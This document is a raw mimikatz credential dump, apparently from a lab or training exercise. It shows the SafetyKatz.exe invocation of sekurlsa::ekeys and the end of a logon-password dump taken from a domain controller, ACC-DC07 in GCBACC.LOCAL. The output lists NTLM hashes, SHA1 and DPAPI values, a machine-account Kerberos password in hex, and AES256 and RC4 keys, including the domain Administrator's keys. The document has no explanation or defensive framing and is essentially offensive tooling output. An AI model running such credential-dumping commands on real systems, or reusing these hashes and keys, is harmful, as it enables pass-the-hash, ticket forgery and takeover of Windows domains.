               * Password : 58 99 0b dd e5 93 96 6c 29 e4 00 32 41 9a 4e 50 3c 4f cd 20 2f c2 32 4c 91 ec d0 f3 74 f1 e1 bc 3c 95 f2 c0 bf 8e cd 9a 9d ad 91 30 5d 84 03 fb f4 68 ec a9 cd 85 21 2d 6c 09 80 c7 7e 68 7a ee a6 d6 3e 57 c8 2d 54 36 49 3c 26 82 16 44 a3 c3 64 2a cf 91 e3 b3 63 21 33 a2 e4 84 04 78 37 6a 39 25 2c df 9c 8a a6 41 97 f5 82 ac ac 52 a6 76 66 4a a8 3b 4b 53 75 e7 39 04 f8 51 ba 44 c1 f7 14 14 74 13 e4 5b 37 4f 94 21 e2 57 dc ae 6d 96 7b 41 ac 66 b1 cc d1 f3 3f 59 10 2b 2b c8 74 ea e9 b2 b2 bc db ca 38 a6 ea 8d ad d6 f4 b6 c2 ae cd bd b2 f5 8e 3b 35 7e 8c c8 46 4e bf fa 1e 73 30 3b dd 58 1e 38 08 42 7a 3b 47 43 81 14 c6 1e 82 47 40 dd 52 56 b2 ec e5 4c 61 3c 9c a2 ce 3d 09 8d 3e f9 f8 af 1c f4 1b 63 49 99 ca 48 12 2c
              ssp :
              credman :
      
      Authentication Id : 0 ; 999 (00000000:000003e7)
      Session           : UndefinedLogonType from 0
      User Name         : ACC-DC07$
      Domain            : ACC
      Logon Server      : (null)
      Logon Time        : 2/15/2024 4:40:56 AM
      SID               : S-1-5-18
              msv :
              tspkg :
              wdigest :
               * Username : ACC-DC07$
               * Domain   : ACC
               * Password : (null)
              kerberos :
               * Username : acc-dc07$
               * Domain   : GCBACC.LOCAL
               * Password : (null)
              ssp :
              credman :
      
      Authentication Id : 0 ; 52769 (00000000:0000ce21)
      Session           : Interactive from 1
      User Name         : DWM-1
      Domain            : Window Manager
      Logon Server      : (null)
      Logon Time        : 2/15/2024 4:41:02 AM
      SID               : S-1-5-90-0-1
              msv :
               [00000003] Primary
               * Username : ACC-DC07$
               * Domain   : ACC
               * NTLM     : b337f797ea0ada49d01db9f8c1fe0255
               * SHA1     : 0b02db293a8bf55e63e6006e28d3e550bce86a2f
               * DPAPI    : 0b02db293a8bf55e63e6006e28d3e550
              tspkg :
              wdigest :
               * Username : ACC-DC07$
               * Domain   : ACC
               * Password : (null)
              kerberos :
               * Username : ACC-DC07$
               * Domain   : gcbacc.local
               * Password : 58 99 0b dd e5 93 96 6c 29 e4 00 32 41 9a 4e 50 3c 4f cd 20 2f c2 32 4c 91 ec d0 f3 74 f1 e1 bc 3c 95 f2 c0 bf 8e cd 9a 9d ad 91 30 5d 84 03 fb f4 68 ec a9 cd 85 21 2d 6c 09 80 c7 7e 68 7a ee a6 d6 3e 57 c8 2d 54 36 49 3c 26 82 16 44 a3 c3 64 2a cf 91 e3 b3 63 21 33 a2 e4 84 04 78 37 6a 39 25 2c df 9c 8a a6 41 97 f5 82 ac ac 52 a6 76 66 4a a8 3b 4b 53 75 e7 39 04 f8 51 ba 44 c1 f7 14 14 74 13 e4 5b 37 4f 94 21 e2 57 dc ae 6d 96 7b 41 ac 66 b1 cc d1 f3 3f 59 10 2b 2b c8 74 ea e9 b2 b2 bc db ca 38 a6 ea 8d ad d6 f4 b6 c2 ae cd bd b2 f5 8e 3b 35 7e 8c c8 46 4e bf fa 1e 73 30 3b dd 58 1e 38 08 42 7a 3b 47 43 81 14 c6 1e 82 47 40 dd 52 56 b2 ec e5 4c 61 3c 9c a2 ce 3d 09 8d 3e f9 f8 af 1c f4 1b 63 49 99 ca 48 12 2c
              ssp :
              credman :
      
      Authentication Id : 0 ; 996 (00000000:000003e4)
      Session           : Service from 0
      User Name         : ACC-DC07$
      Domain            : ACC
      Logon Server      : (null)
      Logon Time        : 2/15/2024 4:41:01 AM
      SID               : S-1-5-20
              msv :
               [00000003] Primary
               * Username : ACC-DC07$
               * Domain   : ACC
               * NTLM     : b337f797ea0ada49d01db9f8c1fe0255
               * SHA1     : 0b02db293a8bf55e63e6006e28d3e550bce86a2f
               * DPAPI    : 0b02db293a8bf55e63e6006e28d3e550
              tspkg :
              wdigest :
               * Username : ACC-DC07$
               * Domain   : ACC
               * Password : (null)
              kerberos :
               * Username : acc-dc07$
               * Domain   : GCBACC.LOCAL
               * Password : (null)
              ssp :
              credman :
      
      Authentication Id : 0 ; 31277 (00000000:00007a2d)
      Session           : Interactive from 1
      User Name         : UMFD-1
      Domain            : Font Driver Host
      Logon Server      : (null)
      Logon Time        : 2/15/2024 4:41:00 AM
      SID               : S-1-5-96-0-1
              msv :
               [00000003] Primary
               * Username : ACC-DC07$
               * Domain   : ACC
               * NTLM     : b337f797ea0ada49d01db9f8c1fe0255
               * SHA1     : 0b02db293a8bf55e63e6006e28d3e550bce86a2f
               * DPAPI    : 0b02db293a8bf55e63e6006e28d3e550
              tspkg :
              wdigest :
               * Username : ACC-DC07$
               * Domain   : ACC
               * Password : (null)
              kerberos :
               * Username : ACC-DC07$
               * Domain   : gcbacc.local
               * Password : 58 99 0b dd e5 93 96 6c 29 e4 00 32 41 9a 4e 50 3c 4f cd 20 2f c2 32 4c 91 ec d0 f3 74 f1 e1 bc 3c 95 f2 c0 bf 8e cd 9a 9d ad 91 30 5d 84 03 fb f4 68 ec a9 cd 85 21 2d 6c 09 80 c7 7e 68 7a ee a6 d6 3e 57 c8 2d 54 36 49 3c 26 82 16 44 a3 c3 64 2a cf 91 e3 b3 63 21 33 a2 e4 84 04 78 37 6a 39 25 2c df 9c 8a a6 41 97 f5 82 ac ac 52 a6 76 66 4a a8 3b 4b 53 75 e7 39 04 f8 51 ba 44 c1 f7 14 14 74 13 e4 5b 37 4f 94 21 e2 57 dc ae 6d 96 7b 41 ac 66 b1 cc d1 f3 3f 59 10 2b 2b c8 74 ea e9 b2 b2 bc db ca 38 a6 ea 8d ad d6 f4 b6 c2 ae cd bd b2 f5 8e 3b 35 7e 8c c8 46 4e bf fa 1e 73 30 3b dd 58 1e 38 08 42 7a 3b 47 43 81 14 c6 1e 82 47 40 dd 52 56 b2 ec e5 4c 61 3c 9c a2 ce 3d 09 8d 3e f9 f8 af 1c f4 1b 63 49 99 ca 48 12 2c
              ssp :
              credman :
      
      Authentication Id : 0 ; 31261 (00000000:00007a1d)
      Session           : Interactive from 0
      User Name         : UMFD-0
      Domain            : Font Driver Host
      Logon Server      : (null)
      Logon Time        : 2/15/2024 4:41:00 AM
      SID               : S-1-5-96-0-0
              msv :
               [00000003] Primary
               * Username : ACC-DC07$
               * Domain   : ACC
               * NTLM     : b337f797ea0ada49d01db9f8c1fe0255
               * SHA1     : 0b02db293a8bf55e63e6006e28d3e550bce86a2f
               * DPAPI    : 0b02db293a8bf55e63e6006e28d3e550
              tspkg :
              wdigest :
               * Username : ACC-DC07$
               * Domain   : ACC
               * Password : (null)
              kerberos :
               * Username : ACC-DC07$
               * Domain   : gcbacc.local
               * Password : 58 99 0b dd e5 93 96 6c 29 e4 00 32 41 9a 4e 50 3c 4f cd 20 2f c2 32 4c 91 ec d0 f3 74 f1 e1 bc 3c 95 f2 c0 bf 8e cd 9a 9d ad 91 30 5d 84 03 fb f4 68 ec a9 cd 85 21 2d 6c 09 80 c7 7e 68 7a ee a6 d6 3e 57 c8 2d 54 36 49 3c 26 82 16 44 a3 c3 64 2a cf 91 e3 b3 63 21 33 a2 e4 84 04 78 37 6a 39 25 2c df 9c 8a a6 41 97 f5 82 ac ac 52 a6 76 66 4a a8 3b 4b 53 75 e7 39 04 f8 51 ba 44 c1 f7 14 14 74 13 e4 5b 37 4f 94 21 e2 57 dc ae 6d 96 7b 41 ac 66 b1 cc d1 f3 3f 59 10 2b 2b c8 74 ea e9 b2 b2 bc db ca 38 a6 ea 8d ad d6 f4 b6 c2 ae cd bd b2 f5 8e 3b 35 7e 8c c8 46 4e bf fa 1e 73 30 3b dd 58 1e 38 08 42 7a 3b 47 43 81 14 c6 1e 82 47 40 dd 52 56 b2 ec e5 4c 61 3c 9c a2 ce 3d 09 8d 3e f9 f8 af 1c f4 1b 63 49 99 ca 48 12 2c
              ssp :
              credman :
      
      Authentication Id : 0 ; 31245 (00000000:00007a0d)
      Session           : Interactive from 1
      User Name         : UMFD-1
      Domain            : Font Driver Host
      Logon Server      : (null)
      Logon Time        : 2/15/2024 4:41:00 AM
      SID               : S-1-5-96-0-1
              msv :
               [00000003] Primary
               * Username : ACC-DC07$
               * Domain   : ACC
               * NTLM     : b337f797ea0ada49d01db9f8c1fe0255
               * SHA1     : 0b02db293a8bf55e63e6006e28d3e550bce86a2f
               * DPAPI    : 0b02db293a8bf55e63e6006e28d3e550
              tspkg :
              wdigest :
               * Username : ACC-DC07$
               * Domain   : ACC
               * Password : (null)
              kerberos :
               * Username : ACC-DC07$
               * Domain   : gcbacc.local
               * Password : 58 99 0b dd e5 93 96 6c 29 e4 00 32 41 9a 4e 50 3c 4f cd 20 2f c2 32 4c 91 ec d0 f3 74 f1 e1 bc 3c 95 f2 c0 bf 8e cd 9a 9d ad 91 30 5d 84 03 fb f4 68 ec a9 cd 85 21 2d 6c 09 80 c7 7e 68 7a ee a6 d6 3e 57 c8 2d 54 36 49 3c 26 82 16 44 a3 c3 64 2a cf 91 e3 b3 63 21 33 a2 e4 84 04 78 37 6a 39 25 2c df 9c 8a a6 41 97 f5 82 ac ac 52 a6 76 66 4a a8 3b 4b 53 75 e7 39 04 f8 51 ba 44 c1 f7 14 14 74 13 e4 5b 37 4f 94 21 e2 57 dc ae 6d 96 7b 41 ac 66 b1 cc d1 f3 3f 59 10 2b 2b c8 74 ea e9 b2 b2 bc db ca 38 a6 ea 8d ad d6 f4 b6 c2 ae cd bd b2 f5 8e 3b 35 7e 8c c8 46 4e bf fa 1e 73 30 3b dd 58 1e 38 08 42 7a 3b 47 43 81 14 c6 1e 82 47 40 dd 52 56 b2 ec e5 4c 61 3c 9c a2 ce 3d 09 8d 3e f9 f8 af 1c f4 1b 63 49 99 ca 48 12 2c
              ssp :
              credman :
      
      Authentication Id : 0 ; 997 (00000000:000003e5)
      Session           : Service from 0
      User Name         : LOCAL SERVICE
      Domain            : NT AUTHORITY
      Logon Server      : (null)
      Logon Time        : 2/15/2024 4:41:02 AM
      SID               : S-1-5-19
              msv :
              tspkg :
              wdigest :
               * Username : (null)
               * Domain   : (null)
               * Password : (null)
              kerberos :
               * Username : (null)
               * Domain   : (null)
               * Password : (null)
              ssp :
              credman :
      
      mimikatz(commandline) # exit
    • ekeys
      C:\SafetyKatz.exe "privilege::debug" "sekurlsa::ekeys" "exit"
      
        .#####.   mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
       .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
       ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
       ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
       '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
        '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/
      
      mimikatz(commandline) # privilege::debug
      Privilege '20' OK
      
      mimikatz(commandline) # sekurlsa::ekeys
      
      Authentication Id : 0 ; 1374712 (00000000:0014f9f8)
      Session           : RemoteInteractive from 2
      User Name         : Administrator
      Domain            : ACC
      Logon Server      : ACC-DC07
      Logon Time        : 2/15/2024 4:55:25 AM
      SID               : S-1-5-21-3331877400-209796306-1317730910-500
      
               * Username : Administrator
               * Domain   : GCBACC.LOCAL
               * Password : (null)
               * Key List :
                 aes256_hmac       c7be62bcc5d4e1d45c29c4e90bc543c0596b4f0b31bffb791cfec73ae93e334f
                 rc4_hmac_nt       70d6b3cabbe11f8f0b06a7380e7a5005
                 rc4_hmac_old      70d6b3cabbe11f8f0b06a7380e7a5005
                 rc4_md4           70d6b3cabbe11f8f0b06a7380e7a5005
                 rc4_hmac_nt_exp   70d6b3cabbe11f8f0b06a7380e7a5005
                 rc4_hmac_old_exp  70d6b3cabbe11f8f0b06a7380e7a5005
      
      Authentication Id : 0 ; 120693 (00000000:0001d775)
      Session           : Interactive from 2
      User Name         : DWM-2
      Domain            : Window Manager
      Logon Server      : (null)
      Logon Time        : 2/15/2024 4:41:11 AM
      SID               : S-1-5-90-0-2
      
               * Username : ACC-DC07$
               * Domain   : gcbacc.local
               * Password : 58 99 0b dd e5 93 96 6c 29 e4 00 32 41 9a 4e 50 3c 4f cd 20 2f c2 32 4c 91 ec d0 f3 74 f1 e1 bc 3c 95 f2 c0 bf 8e cd 9a 9d ad 91 30 5d 84 03 fb f4 68 ec a9 cd 85 21 2d 6c 09 80 c7 7e 68 7a ee a6 d6 3e 57 c8 2d 54 36 49 3c 26 82 16 44 a3 c3 64 2a cf 91 e3 b3 63 21 33 a2 e4 84 04 78 37 6a 39 25 2c df 9c 8a a6 41 97 f5 82 ac ac 52 a6 76 66 4a a8 3b 4b 53 75 e7 39 04 f8 51 ba 44 c1 f7 14 14 74 13 e4 5b 37 4f 94 21 e2 57 dc ae 6d 96 7b 41 ac 66 b1 cc d1 f3 3f 59 10 2b 2b c8 74 ea e9 b2 b2 bc db ca 38 a6 ea 8d ad d6 f4 b6 c2 ae cd bd b2 f5 8e 3b 35 7e 8c c8 46 4e bf fa 1e 73 30 3b dd 58 1e 38 08 42 7a 3b 47 43 81 14 c6 1e 82 47 40 dd 52 56 b2 ec e5 4c 61 3c 9c a2 ce 3d 09 8d 3e f9 f8 af 1c f4 1b 63 49 99 ca 48 12 2c
               * Key List :
                 aes256_hmac       94f15beb31b7fdfcb7a40b661561c834dcb726ac92128cc0f5a213de7f9ba06c
                 aes128_hmac       abfc201f107b2392d9084d8542489d09
                 rc4_hmac_nt       b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_old      b337f797ea0ada49d01db9f8c1fe0255
                 rc4_md4           b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_nt_exp   b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_old_exp  b337f797ea0ada49d01db9f8c1fe0255
      
      Authentication Id : 0 ; 120215 (00000000:0001d597)
      Session           : Interactive from 2
      User Name         : DWM-2
      Domain            : Window Manager
      Logon Server      : (null)
      Logon Time        : 2/15/2024 4:41:11 AM
      SID               : S-1-5-90-0-2
      
               * Username : ACC-DC07$
               * Domain   : gcbacc.local
               * Password : 58 99 0b dd e5 93 96 6c 29 e4 00 32 41 9a 4e 50 3c 4f cd 20 2f c2 32 4c 91 ec d0 f3 74 f1 e1 bc 3c 95 f2 c0 bf 8e cd 9a 9d ad 91 30 5d 84 03 fb f4 68 ec a9 cd 85 21 2d 6c 09 80 c7 7e 68 7a ee a6 d6 3e 57 c8 2d 54 36 49 3c 26 82 16 44 a3 c3 64 2a cf 91 e3 b3 63 21 33 a2 e4 84 04 78 37 6a 39 25 2c df 9c 8a a6 41 97 f5 82 ac ac 52 a6 76 66 4a a8 3b 4b 53 75 e7 39 04 f8 51 ba 44 c1 f7 14 14 74 13 e4 5b 37 4f 94 21 e2 57 dc ae 6d 96 7b 41 ac 66 b1 cc d1 f3 3f 59 10 2b 2b c8 74 ea e9 b2 b2 bc db ca 38 a6 ea 8d ad d6 f4 b6 c2 ae cd bd b2 f5 8e 3b 35 7e 8c c8 46 4e bf fa 1e 73 30 3b dd 58 1e 38 08 42 7a 3b 47 43 81 14 c6 1e 82 47 40 dd 52 56 b2 ec e5 4c 61 3c 9c a2 ce 3d 09 8d 3e f9 f8 af 1c f4 1b 63 49 99 ca 48 12 2c
               * Key List :
                 aes256_hmac       94f15beb31b7fdfcb7a40b661561c834dcb726ac92128cc0f5a213de7f9ba06c
                 aes128_hmac       abfc201f107b2392d9084d8542489d09
                 rc4_hmac_nt       b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_old      b337f797ea0ada49d01db9f8c1fe0255
                 rc4_md4           b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_nt_exp   b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_old_exp  b337f797ea0ada49d01db9f8c1fe0255
      
      Authentication Id : 0 ; 118398 (00000000:0001ce7e)
      Session           : Interactive from 2
      User Name         : UMFD-2
      Domain            : Font Driver Host
      Logon Server      : (null)
      Logon Time        : 2/15/2024 4:41:10 AM
      SID               : S-1-5-96-0-2
      
               * Username : ACC-DC07$
               * Domain   : gcbacc.local
               * Password : 58 99 0b dd e5 93 96 6c 29 e4 00 32 41 9a 4e 50 3c 4f cd 20 2f c2 32 4c 91 ec d0 f3 74 f1 e1 bc 3c 95 f2 c0 bf 8e cd 9a 9d ad 91 30 5d 84 03 fb f4 68 ec a9 cd 85 21 2d 6c 09 80 c7 7e 68 7a ee a6 d6 3e 57 c8 2d 54 36 49 3c 26 82 16 44 a3 c3 64 2a cf 91 e3 b3 63 21 33 a2 e4 84 04 78 37 6a 39 25 2c df 9c 8a a6 41 97 f5 82 ac ac 52 a6 76 66 4a a8 3b 4b 53 75 e7 39 04 f8 51 ba 44 c1 f7 14 14 74 13 e4 5b 37 4f 94 21 e2 57 dc ae 6d 96 7b 41 ac 66 b1 cc d1 f3 3f 59 10 2b 2b c8 74 ea e9 b2 b2 bc db ca 38 a6 ea 8d ad d6 f4 b6 c2 ae cd bd b2 f5 8e 3b 35 7e 8c c8 46 4e bf fa 1e 73 30 3b dd 58 1e 38 08 42 7a 3b 47 43 81 14 c6 1e 82 47 40 dd 52 56 b2 ec e5 4c 61 3c 9c a2 ce 3d 09 8d 3e f9 f8 af 1c f4 1b 63 49 99 ca 48 12 2c
               * Key List :
                 aes256_hmac       94f15beb31b7fdfcb7a40b661561c834dcb726ac92128cc0f5a213de7f9ba06c
                 aes128_hmac       abfc201f107b2392d9084d8542489d09
                 rc4_hmac_nt       b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_old      b337f797ea0ada49d01db9f8c1fe0255
                 rc4_md4           b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_nt_exp   b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_old_exp  b337f797ea0ada49d01db9f8c1fe0255
      
      Authentication Id : 0 ; 118358 (00000000:0001ce56)
      Session           : Interactive from 2
      User Name         : UMFD-2
      Domain            : Font Driver Host
      Logon Server      : (null)
      Logon Time        : 2/15/2024 4:41:10 AM
      SID               : S-1-5-96-0-2
      
               * Username : ACC-DC07$
               * Domain   : gcbacc.local
               * Password : 58 99 0b dd e5 93 96 6c 29 e4 00 32 41 9a 4e 50 3c 4f cd 20 2f c2 32 4c 91 ec d0 f3 74 f1 e1 bc 3c 95 f2 c0 bf 8e cd 9a 9d ad 91 30 5d 84 03 fb f4 68 ec a9 cd 85 21 2d 6c 09 80 c7 7e 68 7a ee a6 d6 3e 57 c8 2d 54 36 49 3c 26 82 16 44 a3 c3 64 2a cf 91 e3 b3 63 21 33 a2 e4 84 04 78 37 6a 39 25 2c df 9c 8a a6 41 97 f5 82 ac ac 52 a6 76 66 4a a8 3b 4b 53 75 e7 39 04 f8 51 ba 44 c1 f7 14 14 74 13 e4 5b 37 4f 94 21 e2 57 dc ae 6d 96 7b 41 ac 66 b1 cc d1 f3 3f 59 10 2b 2b c8 74 ea e9 b2 b2 bc db ca 38 a6 ea 8d ad d6 f4 b6 c2 ae cd bd b2 f5 8e 3b 35 7e 8c c8 46 4e bf fa 1e 73 30 3b dd 58 1e 38 08 42 7a 3b 47 43 81 14 c6 1e 82 47 40 dd 52 56 b2 ec e5 4c 61 3c 9c a2 ce 3d 09 8d 3e f9 f8 af 1c f4 1b 63 49 99 ca 48 12 2c
               * Key List :
                 aes256_hmac       94f15beb31b7fdfcb7a40b661561c834dcb726ac92128cc0f5a213de7f9ba06c
                 aes128_hmac       abfc201f107b2392d9084d8542489d09
                 rc4_hmac_nt       b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_old      b337f797ea0ada49d01db9f8c1fe0255
                 rc4_md4           b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_nt_exp   b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_old_exp  b337f797ea0ada49d01db9f8c1fe0255
      
      Authentication Id : 0 ; 31224 (00000000:000079f8)
      Session           : Interactive from 0
      User Name         : UMFD-0
      Domain            : Font Driver Host
      Logon Server      : (null)
      Logon Time        : 2/15/2024 4:41:00 AM
      SID               : S-1-5-96-0-0
      
               * Username : ACC-DC07$
               * Domain   : gcbacc.local
               * Password : 58 99 0b dd e5 93 96 6c 29 e4 00 32 41 9a 4e 50 3c 4f cd 20 2f c2 32 4c 91 ec d0 f3 74 f1 e1 bc 3c 95 f2 c0 bf 8e cd 9a 9d ad 91 30 5d 84 03 fb f4 68 ec a9 cd 85 21 2d 6c 09 80 c7 7e 68 7a ee a6 d6 3e 57 c8 2d 54 36 49 3c 26 82 16 44 a3 c3 64 2a cf 91 e3 b3 63 21 33 a2 e4 84 04 78 37 6a 39 25 2c df 9c 8a a6 41 97 f5 82 ac ac 52 a6 76 66 4a a8 3b 4b 53 75 e7 39 04 f8 51 ba 44 c1 f7 14 14 74 13 e4 5b 37 4f 94 21 e2 57 dc ae 6d 96 7b 41 ac 66 b1 cc d1 f3 3f 59 10 2b 2b c8 74 ea e9 b2 b2 bc db ca 38 a6 ea 8d ad d6 f4 b6 c2 ae cd bd b2 f5 8e 3b 35 7e 8c c8 46 4e bf fa 1e 73 30 3b dd 58 1e 38 08 42 7a 3b 47 43 81 14 c6 1e 82 47 40 dd 52 56 b2 ec e5 4c 61 3c 9c a2 ce 3d 09 8d 3e f9 f8 af 1c f4 1b 63 49 99 ca 48 12 2c
               * Key List :
                 aes256_hmac       94f15beb31b7fdfcb7a40b661561c834dcb726ac92128cc0f5a213de7f9ba06c
                 aes128_hmac       abfc201f107b2392d9084d8542489d09
                 rc4_hmac_nt       b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_old      b337f797ea0ada49d01db9f8c1fe0255
                 rc4_md4           b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_nt_exp   b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_old_exp  b337f797ea0ada49d01db9f8c1fe0255
      
      Authentication Id : 0 ; 52645 (00000000:0000cda5)
      Session           : Interactive from 1
      User Name         : DWM-1
      Domain            : Window Manager
      Logon Server      : (null)
      Logon Time        : 2/15/2024 4:41:02 AM
      SID               : S-1-5-90-0-1
      
               * Username : ACC-DC07$
               * Domain   : gcbacc.local
               * Password : 58 99 0b dd e5 93 96 6c 29 e4 00 32 41 9a 4e 50 3c 4f cd 20 2f c2 32 4c 91 ec d0 f3 74 f1 e1 bc 3c 95 f2 c0 bf 8e cd 9a 9d ad 91 30 5d 84 03 fb f4 68 ec a9 cd 85 21 2d 6c 09 80 c7 7e 68 7a ee a6 d6 3e 57 c8 2d 54 36 49 3c 26 82 16 44 a3 c3 64 2a cf 91 e3 b3 63 21 33 a2 e4 84 04 78 37 6a 39 25 2c df 9c 8a a6 41 97 f5 82 ac ac 52 a6 76 66 4a a8 3b 4b 53 75 e7 39 04 f8 51 ba 44 c1 f7 14 14 74 13 e4 5b 37 4f 94 21 e2 57 dc ae 6d 96 7b 41 ac 66 b1 cc d1 f3 3f 59 10 2b 2b c8 74 ea e9 b2 b2 bc db ca 38 a6 ea 8d ad d6 f4 b6 c2 ae cd bd b2 f5 8e 3b 35 7e 8c c8 46 4e bf fa 1e 73 30 3b dd 58 1e 38 08 42 7a 3b 47 43 81 14 c6 1e 82 47 40 dd 52 56 b2 ec e5 4c 61 3c 9c a2 ce 3d 09 8d 3e f9 f8 af 1c f4 1b 63 49 99 ca 48 12 2c
               * Key List :
                 aes256_hmac       94f15beb31b7fdfcb7a40b661561c834dcb726ac92128cc0f5a213de7f9ba06c
                 aes128_hmac       abfc201f107b2392d9084d8542489d09
                 rc4_hmac_nt       b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_old      b337f797ea0ada49d01db9f8c1fe0255
                 rc4_md4           b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_nt_exp   b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_old_exp  b337f797ea0ada49d01db9f8c1fe0255
      
      Authentication Id : 0 ; 999 (00000000:000003e7)
      Session           : UndefinedLogonType from 0
      User Name         : ACC-DC07$
      Domain            : ACC
      Logon Server      : (null)
      Logon Time        : 2/15/2024 4:40:56 AM
      SID               : S-1-5-18
      
               * Username : acc-dc07$
               * Domain   : GCBACC.LOCAL
               * Password : (null)
               * Key List :
                 aes256_hmac       0b6fa3cfdabc43dc636e634d54f24b924a29a2a50ae5af9a887f39fc22e495c8
                 rc4_hmac_nt       b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_old      b337f797ea0ada49d01db9f8c1fe0255
                 rc4_md4           b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_nt_exp   b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_old_exp  b337f797ea0ada49d01db9f8c1fe0255
      
      Authentication Id : 0 ; 52769 (00000000:0000ce21)
      Session           : Interactive from 1
      User Name         : DWM-1
      Domain            : Window Manager
      Logon Server      : (null)
      Logon Time        : 2/15/2024 4:41:02 AM
      SID               : S-1-5-90-0-1
      
               * Username : ACC-DC07$
               * Domain   : gcbacc.local
               * Password : 58 99 0b dd e5 93 96 6c 29 e4 00 32 41 9a 4e 50 3c 4f cd 20 2f c2 32 4c 91 ec d0 f3 74 f1 e1 bc 3c 95 f2 c0 bf 8e cd 9a 9d ad 91 30 5d 84 03 fb f4 68 ec a9 cd 85 21 2d 6c 09 80 c7 7e 68 7a ee a6 d6 3e 57 c8 2d 54 36 49 3c 26 82 16 44 a3 c3 64 2a cf 91 e3 b3 63 21 33 a2 e4 84 04 78 37 6a 39 25 2c df 9c 8a a6 41 97 f5 82 ac ac 52 a6 76 66 4a a8 3b 4b 53 75 e7 39 04 f8 51 ba 44 c1 f7 14 14 74 13 e4 5b 37 4f 94 21 e2 57 dc ae 6d 96 7b 41 ac 66 b1 cc d1 f3 3f 59 10 2b 2b c8 74 ea e9 b2 b2 bc db ca 38 a6 ea 8d ad d6 f4 b6 c2 ae cd bd b2 f5 8e 3b 35 7e 8c c8 46 4e bf fa 1e 73 30 3b dd 58 1e 38 08 42 7a 3b 47 43 81 14 c6 1e 82 47 40 dd 52 56 b2 ec e5 4c 61 3c 9c a2 ce 3d 09 8d 3e f9 f8 af 1c f4 1b 63 49 99 ca 48 12 2c
               * Key List :
                 aes256_hmac       94f15beb31b7fdfcb7a40b661561c834dcb726ac92128cc0f5a213de7f9ba06c
                 aes128_hmac       abfc201f107b2392d9084d8542489d09
                 rc4_hmac_nt       b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_old      b337f797ea0ada49d01db9f8c1fe0255
                 rc4_md4           b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_nt_exp   b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_old_exp  b337f797ea0ada49d01db9f8c1fe0255
      
      Authentication Id : 0 ; 996 (00000000:000003e4)
      Session           : Service from 0
      User Name         : ACC-DC07$
      Domain            : ACC
      Logon Server      : (null)
      Logon Time        : 2/15/2024 4:41:01 AM
      SID               : S-1-5-20
      
               * Username : acc-dc07$
               * Domain   : GCBACC.LOCAL
               * Password : (null)
               * Key List :
                 aes256_hmac       0b6fa3cfdabc43dc636e634d54f24b924a29a2a50ae5af9a887f39fc22e495c8
                 rc4_hmac_nt       b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_old      b337f797ea0ada49d01db9f8c1fe0255
                 rc4_md4           b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_nt_exp   b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_old_exp  b337f797ea0ada49d01db9f8c1fe0255
      
      Authentication Id : 0 ; 31277 (00000000:00007a2d)
      Session           : Interactive from 1
      User Name         : UMFD-1
      Domain            : Font Driver Host
      Logon Server      : (null)
      Logon Time        : 2/15/2024 4:41:00 AM
      SID               : S-1-5-96-0-1
      
               * Username : ACC-DC07$
               * Domain   : gcbacc.local
               * Password : 58 99 0b dd e5 93 96 6c 29 e4 00 32 41 9a 4e 50 3c 4f cd 20 2f c2 32 4c 91 ec d0 f3 74 f1 e1 bc 3c 95 f2 c0 bf 8e cd 9a 9d ad 91 30 5d 84 03 fb f4 68 ec a9 cd 85 21 2d 6c 09 80 c7 7e 68 7a ee a6 d6 3e 57 c8 2d 54 36 49 3c 26 82 16 44 a3 c3 64 2a cf 91 e3 b3 63 21 33 a2 e4 84 04 78 37 6a 39 25 2c df 9c 8a a6 41 97 f5 82 ac ac 52 a6 76 66 4a a8 3b 4b 53 75 e7 39 04 f8 51 ba 44 c1 f7 14 14 74 13 e4 5b 37 4f 94 21 e2 57 dc ae 6d 96 7b 41 ac 66 b1 cc d1 f3 3f 59 10 2b 2b c8 74 ea e9 b2 b2 bc db ca 38 a6 ea 8d ad d6 f4 b6 c2 ae cd bd b2 f5 8e 3b 35 7e 8c c8 46 4e bf fa 1e 73 30 3b dd 58 1e 38 08 42 7a 3b 47 43 81 14 c6 1e 82 47 40 dd 52 56 b2 ec e5 4c 61 3c 9c a2 ce 3d 09 8d 3e f9 f8 af 1c f4 1b 63 49 99 ca 48 12 2c
               * Key List :
                 aes256_hmac       94f15beb31b7fdfcb7a40b661561c834dcb726ac92128cc0f5a213de7f9ba06c
                 aes128_hmac       abfc201f107b2392d9084d8542489d09
                 rc4_hmac_nt       b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_old      b337f797ea0ada49d01db9f8c1fe0255
                 rc4_md4           b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_nt_exp   b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_old_exp  b337f797ea0ada49d01db9f8c1fe0255
      
